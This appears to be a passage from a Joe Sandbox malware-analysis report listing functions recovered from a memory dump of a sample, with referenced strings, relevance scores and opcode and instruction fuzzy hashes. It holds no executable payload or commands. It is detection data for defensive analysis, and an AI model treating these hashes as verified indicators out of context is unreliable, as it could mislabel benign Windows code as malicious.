Opcode Fuzzy Hash: d4d39c9c965ebdff5d24e0f544aee9b5cf076e351eef98511da9d3bfb2ad8b14
Instruction Fuzzy Hash: 1FE19F71B08219DFEB22DE99C994BAEBBF9BF04310F10446AE9C1EBA51D734D940CB50

Function 0114A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0114A44B
`, xrefs: 0114A551

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: bc5b0cb449afaf569bdd199b49ecc3c1cbf71806bf0d39f183e9430fafe03e4d
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 91C1E4312443429BEB29CF28D841B6BBBE5BFC4B18F094A2DF696CB290D775D505CB81

Function 010FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 010FE75A
UEFI, xrefs: 010FE751

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: cd9cb6601336b4c282634ab41af3bf3dd4cc68e5becb3548412fed0697432051
Instruction ID: d77bb77303b75be1540ef3469cca5b711aefa2a73bb99ee9dbe14dabbb94fc76
Opcode Fuzzy Hash: cd9cb6601336b4c282634ab41af3bf3dd4cc68e5becb3548412fed0697432051
Instruction Fuzzy Hash: 2F615B71E003099FDB24DFA8C841BAEBBF9FB48700F15406DE689EB6A1D731A901CB50

Function 011243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01124525
@, xrefs: 01124437

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: fbac4ad2301095540eb6ea9e1d81c202bfdc7086792491405fc84e895c4479f5
Instruction ID: 9a6be4c98b7038fd002ebfac5be9f1890484f8319e7371ab234bcc0f68f3e6a2
Opcode Fuzzy Hash: fbac4ad2301095540eb6ea9e1d81c202bfdc7086792491405fc84e895c4479f5
Instruction Fuzzy Hash: AB5128B1E0062EAEDF15DFA9CC90AEEBBB8EB44754F100529E651B7690D7309E05CB60

Function 010804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 01080540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0108063D

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
Instruction ID: 6de1f93578c88da1cdb3a5d2323a350c1dafc5974bd77f648e5d2c699d4b2c87
Opcode Fuzzy Hash: f1b59cc8a7f2d8239be7e3831e4e373ad45e6854c6e63175cb5a6d869b84a1ce
Instruction Fuzzy Hash: E551AF716087468FD724EF68C4406A7BBE4AF88304F14883EFAE987245E7709549CBA1

Function 0108A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0108A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0108A2FB

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
Instruction ID: 5c60fda5514f1f03659857959585de44759f838d0f1d09ede119d43bf19e4609
Opcode Fuzzy Hash: 239f871bf3d5ebd001c2b92a3381d16e26e4c2a8816039eda13fce633c9cf5e8
Instruction Fuzzy Hash: 0341AC31B08659DFDB21AF69C844BAE7BF4BF84300F1480AAE9C0DB691E2B5D940CB40

Function 010BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 010BA5E4
Threadpool!, xrefs: 010BA5E9

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
Instruction ID: c237710e2e26f6dd59c5c8fc83f61aa2f66f377bb4a4022d248b3efc49236d11
Opcode Fuzzy Hash: ff5709d9f493348a3d62d1648f0400a579a0a27149da18a802ce68fd3c6871c9
Instruction Fuzzy Hash: 7701D1B2240700EFE311DF14CD85B967BF8E798B15F008939B698CB290E734E904CB46

Function 0108C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0108C8C3, 0108CA40

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 3492b321fdf09443d858909c60ed13d90698de2ea342c1aa32ddd426bfbaca91
Instruction ID: 554bf24e92704f14297cd6f20eef976463011498c21eca4112d00b9f7cb56b28
Opcode Fuzzy Hash: 3492b321fdf09443d858909c60ed13d90698de2ea342c1aa32ddd426bfbaca91
Instruction Fuzzy Hash: 7E825F75E042198BEB64EFA9C9807EDBBB1BF44310F1481A9E9D9AB391DB309D41CF50

Function 0112A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON

Download Yara Rule

Strings

@, xrefs: 0112A68B

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
Instruction ID: 5d43f6d2f9e1749ecf888a252d6bc951c05c7a71db93dc559a835a6a34b5bb91
Opcode Fuzzy Hash: 8f0698a05c7df5ae706be8a9c1517482bb8000bbf4f80356fa1e980acedae0fd
Instruction Fuzzy Hash: 4122E5702046B18FEB2DCF2DE054372BBF1AF45300F198459DA968FA86E335E462DB65

Function 01106420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 011065C1

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 47721bcb584c947bc8d59c3e297826bde5dc30d4382bf3538a3d3c4d23a671fc
Instruction ID: 0f25d0f52534f3dfeec7b4321bbd343796366669cc3fe534351857419f0cbae2
Opcode Fuzzy Hash: 47721bcb584c947bc8d59c3e297826bde5dc30d4382bf3538a3d3c4d23a671fc
Instruction Fuzzy Hash: 42915072900219AFEB26DB95CD85FEEBBB8EF18B50F504065F600AB190D775AD10CBA4

Function 0112E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0112E1FA

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6dfbb85c2dd900f5bd2e954010fb49281c20d7109fb44ae5bee3bcc447aa333d
Instruction ID: 87693b12563fe7fbb74d2a01cab694d647c0cb94b85ebb3a7a66e44fa2e69efa
Opcode Fuzzy Hash: 6dfbb85c2dd900f5bd2e954010fb49281c20d7109fb44ae5bee3bcc447aa333d
Instruction Fuzzy Hash: 6A91CC32A02619BEDF2AEBA5DC94FEFBB79EF45740F100029F505A7250EB349911CB91

Function 010BA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 010F67C9

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: c6a56861817605ad923fa24faf242fbb7947b3fbf7581656901d8e3bd270e244
Instruction ID: c5da1db18ea5e377c5aad880b98143b9da5d74a225d407e31fc80d117d59329d
Opcode Fuzzy Hash: c6a56861817605ad923fa24faf242fbb7947b3fbf7581656901d8e3bd270e244
Instruction Fuzzy Hash: E2716CB5E0031A9FDF68CF98C5926EDBBF1BF48700F14816EE685A7641E7329841CB50

Function 01124978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01124A7F

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 1fc42e4d9d6be976fab0b28865ba0e1df77f2c28b3dc07a15116328827881282
Instruction ID: 10d3dbdd48fc405bc691ee696425b893840d7c6e438fd65d21ff583688377693
Opcode Fuzzy Hash: 1fc42e4d9d6be976fab0b28865ba0e1df77f2c28b3dc07a15116328827881282
Instruction Fuzzy Hash: A251A572D0023A9BDF19DFA9D840BEEBBB4AF18B50F054129E956BB640D7349C11CBE4

Function 0109E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0109E6A4

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 41d65b1c9c296d2d47c26dfed9e469833d5336e5b6abdb7cfcd06f8a39cd4633
Instruction ID: 9ecdd65f2b1b67a9c8e01f91c8ffedf59263ad524397205fe518dd19f880e70a
Opcode Fuzzy Hash: 41d65b1c9c296d2d47c26dfed9e469833d5336e5b6abdb7cfcd06f8a39cd4633
Instruction Fuzzy Hash: A641AF72508302ABDB10DA75C894BAFBBE8BF88704F440A6DFAC5D7180E674DD049793

Function 010FC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 010FC77F

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 43695fb4db3b031b940b9ce4d05f622176ec20b8857393f1d3b5be91f3cba7f3
Instruction ID: c5bcc4c5621ac4de39621956901fa1495b02d63e66f908896bbb747ebb16b465
Opcode Fuzzy Hash: 43695fb4db3b031b940b9ce4d05f622176ec20b8857393f1d3b5be91f3cba7f3
Instruction Fuzzy Hash: 074135B1D0062DAAEB21DB50CD86FDEB77CAB54714F0045E9E748AB140DB709E898F94

Function 01116B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01116B91

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 5e4914c64f69d01b74c9322e29621b7a4f42935b8b8648545b9152af01d45396
Instruction ID: dd8fcef6e58e85c8622dfa77ec9ff68bef2311960f00a4489c3973f5b5925220
Opcode Fuzzy Hash: 5e4914c64f69d01b74c9322e29621b7a4f42935b8b8648545b9152af01d45396
Instruction Fuzzy Hash: 62311431B007599AEB2ACB69C850BEEBBB8EF15704F144038E944AB286C7B6D905CB50

Function 010FCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 010FCAA2

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 5a9c67438330546acc77d9bcbbb5d76f0a411b33650e174e2d12634ff15d3f5a
Instruction ID: 102608710b46b15b5b278d4a84493d5cf6c2f7e8297322e51bf54329c73310c9
Opcode Fuzzy Hash: 5a9c67438330546acc77d9bcbbb5d76f0a411b33650e174e2d12634ff15d3f5a
Instruction Fuzzy Hash: DF31353A90050DAFFB16CB59CA53EAFBBB4EB80710F01406DAA41A7650D7309E04DBE0

Function 0110892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0110895E

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: fd811dc5949cb9a125fbe3975df237e4804db68235ef0dc3645f4c8edac8d077
Instruction ID: fd49fbd0254765509f98c5fea5b1be4984898ea5a9c414eae0099fff8c0a26ef
Opcode Fuzzy Hash: fd811dc5949cb9a125fbe3975df237e4804db68235ef0dc3645f4c8edac8d077
Instruction Fuzzy Hash: 2301F731F18206DBEA2E7A59DC84A5A7F75EFC52A4B05002CF68116292DFB06C84C792

Function 01122000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f36d4babfdab5a4deb90a5660ae55748386d9976d2c6c7193267b41477351759
Instruction ID: 0e1fb0293179bfd50c89f6da554ea48ecc6edd5193cf1ed8552027ec89869f46
Opcode Fuzzy Hash: f36d4babfdab5a4deb90a5660ae55748386d9976d2c6c7193267b41477351759
Instruction Fuzzy Hash: E442E3326083618FE72DCF68C890A6FBBE5BF98300F58492DFA8297250D771D955CB52

Function 01118158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
Instruction ID: 334c04a325211b78a9fd23af0cb9979a37f0557fee8c11f4492a05d76a7fb693
Opcode Fuzzy Hash: 6107b9a364142a31e135a968ae70749ada1bb048db41056817b0aa8f66b0e0ac
Instruction Fuzzy Hash: F0423C75E102198FEB29CF69C881BEDFBB5BF48300F19C1A9E949AB245D7349981CF50

Function 01086A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8052268e4868a35f91b5a3c0c2fbd6ac513693366df1ab36ca5e253b5f69d4df
Instruction ID: 8b2ee4aa9461955ea243b4882213d10cc4762698aadd8cfcac87a393e8e979fd
Opcode Fuzzy Hash: 8052268e4868a35f91b5a3c0c2fbd6ac513693366df1ab36ca5e253b5f69d4df
Instruction Fuzzy Hash: 7A32AC70A05205CFDB65DFA9C480BAEBBF1FF48310F1585A9E996AB391DB31E841CB50

Function 010A4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: e1abc7ab516641901c7ce6f162b1cdd23ba83e873560bca8b04a524f760edb12
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: C1F17F74E0021A9FDB55DFE9C590AAEBBF5BF48310F488169E985EB340E7B4E841CB50

Function 0111892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8030176929eb4578ac5f18b4f489114ef5d580b7af600fc475cfda36c4d62aa4
Instruction ID: f05eb1c01ddcef61e2ca04156c1e2093bccb26b7a170d88649bf656a5f725f7a
Opcode Fuzzy Hash: 8030176929eb4578ac5f18b4f489114ef5d580b7af600fc475cfda36c4d62aa4
Instruction Fuzzy Hash: 31D1DF72A0061A8BDF0DCF69C841BFEFBB2BF88304F19C179D955A7245E735A9058B60

Function 010865D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704ccd919d06be14c6f96927b21b55f7e5df5f964f48ab9499299df8590b110b
Instruction ID: db3bb7ae27942513bf2b374e6d9e9fd4e4eee5956142b88f24b8f0bcebc916e4
Opcode Fuzzy Hash: 704ccd919d06be14c6f96927b21b55f7e5df5f964f48ab9499299df8590b110b
Instruction Fuzzy Hash: C1E18071508342CFC715EF28C490A6ABBE1FF89314F0689ADE5D987351EB32E945CB92

Function 01078397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
Instruction ID: 4d84cd9ed7390bfcbdddc1385c4cdd22e395f53074dab07fe89bb02377bd7533
Opcode Fuzzy Hash: ca22217f7d3f87ed92676c1c034c0757d6580b89fc118c6873cb6012356b2879
Instruction Fuzzy Hash: 7AD1F571A003069BDB14DF28C884BBEB7F5BF58304F05856EE996DB280EB34E954CB54

Function 01108243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 9586e6fdef0c0b2ea838aa107c4c58dd329cf18d12eb5a1132bb928431380de1
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: CFB18374E046059FDF2ADF99C940AABBBB5BF84304F14442DAA429B7D1DBB4E905CB10

Function 01090535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 71437b57901b45f8f6907dca8eb96011a6a5e7cd75865f404396a28fca97bfc5
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 16B11631600646EFDF15DB69C864BBEBBFAAF84300F144594E6D2DB285D730E941DB90

Function 010883C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7447ce601568d95a02b538f254c0a32d621cd705347eb2ff869d42338b210c7b
Instruction ID: 10125e6a9f9b0db2ae65215d5087c912835a3ae2647a0221008822dac6ffe09d
Opcode Fuzzy Hash: 7447ce601568d95a02b538f254c0a32d621cd705347eb2ff869d42338b210c7b
Instruction Fuzzy Hash: 69C15774208341CFD7A4DF19C484BAAB7E5BF88304F44896EE9C987291D774E909CFA2

Function 0107C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e28653082149beedd18086169d4dbe980e873ade8e40852d5a63054b1f5c06c
Instruction ID: 36b46d85a5f7f532b1b880eaa72f466a1ef2854c403130bc89d606d93d00fa8b
Opcode Fuzzy Hash: 6e28653082149beedd18086169d4dbe980e873ade8e40852d5a63054b1f5c06c
Instruction Fuzzy Hash: 7BB15F70A002668BEB64CF68C990BADB7F1AF44744F0485E9D58AAB241EB719DC5CB24

Function 010AE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5466a5284fcc183487c9d83caf4f7b8a7700320ff3bc15acec4ee7da90ae1eb4
Instruction ID: 7b97443035c62b600f896e1ab4ec57d69a38c14e468da82256c0139cdfbd3e04
Opcode Fuzzy Hash: 5466a5284fcc183487c9d83caf4f7b8a7700320ff3bc15acec4ee7da90ae1eb4
Instruction Fuzzy Hash: 47A13531E0061A9FEB21DBA9C948BAEBBF4BF04754F1501A5EAD0AB2C1D7749D40CBD1

Function 010C0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589d04687372c730774595f60a01164152fa8714b50a3922e1d7393dd65d0e6b
Instruction ID: 32f61f31038738a0d347a78093ca981768fd03a9927f2c568683263beb049b4c
Opcode Fuzzy Hash: 589d04687372c730774595f60a01164152fa8714b50a3922e1d7393dd65d0e6b
Instruction Fuzzy Hash: 22A1DDB4A0061ADBEB65DF69C891BAEB7F5FF44B18F00402DFA8597285DB34A841CF40

Function 01154500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12374e88a14ff0715dbe34dc1df87cec77581500c4a2dda5a1ac48ad623c6326
Instruction ID: 4d6c524c6357716414a4a6bc9a78ca31df9f026b2180d3c14c57cae134778a1b
Opcode Fuzzy Hash: 12374e88a14ff0715dbe34dc1df87cec77581500c4a2dda5a1ac48ad623c6326
Instruction Fuzzy Hash: 2CA1E072604602EFD719DF58C980B9ABBE9FF48704F450528F9A9DBA51E330ED80CB91

Function 011060E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d4f818426a2d65d07f411b390f675b1eb9aa4ca4de02b5851c4a46cfa1ec03
Instruction ID: c5f2e497a5b01d4617884f33a38ed6e2d2da19e651ceaa7959f7e290e3030619
Opcode Fuzzy Hash: 20d4f818426a2d65d07f411b390f675b1eb9aa4ca4de02b5851c4a46cfa1ec03
Instruction Fuzzy Hash: 0C91C371D0421AAFDF1ACFA8D890BAEBFB5AF48310F154169E614EB381D774D910DBA0

Function 0109E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14dc5361e17932513f5b1381431b69dad339effaf6ef548fb5fb6988292a168
Instruction ID: 7a4c90539ed3fb39bb3a9e9d86df5491e3066a9eee4d35e246e30ae9edef2721
Opcode Fuzzy Hash: a14dc5361e17932513f5b1381431b69dad339effaf6ef548fb5fb6988292a168
Instruction Fuzzy Hash: 71914131A00616DFEF24DB69C4A4BBEBBE1EF94714F0440A9E9859B390EB34DC41DB91

Function 010D6ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be32b85d7e9e1bbf373dd8753a4af0dd368d0c1eeccbc263bd35954c609a6673
Instruction ID: 123f200713012659ead705082396f603333962bf9b145a5bcf5e7729c99e16c4
Opcode Fuzzy Hash: be32b85d7e9e1bbf373dd8753a4af0dd368d0c1eeccbc263bd35954c609a6673
Instruction Fuzzy Hash: BA818271E007199BDB14CF69D850ABEBBF9FB48710F14852EE885D7640E735D980CB94

Function 01076D10 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1882900814.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_zAg7xx1vKI.jbxd

Similarity

API ID:
String ID:
API String ID:
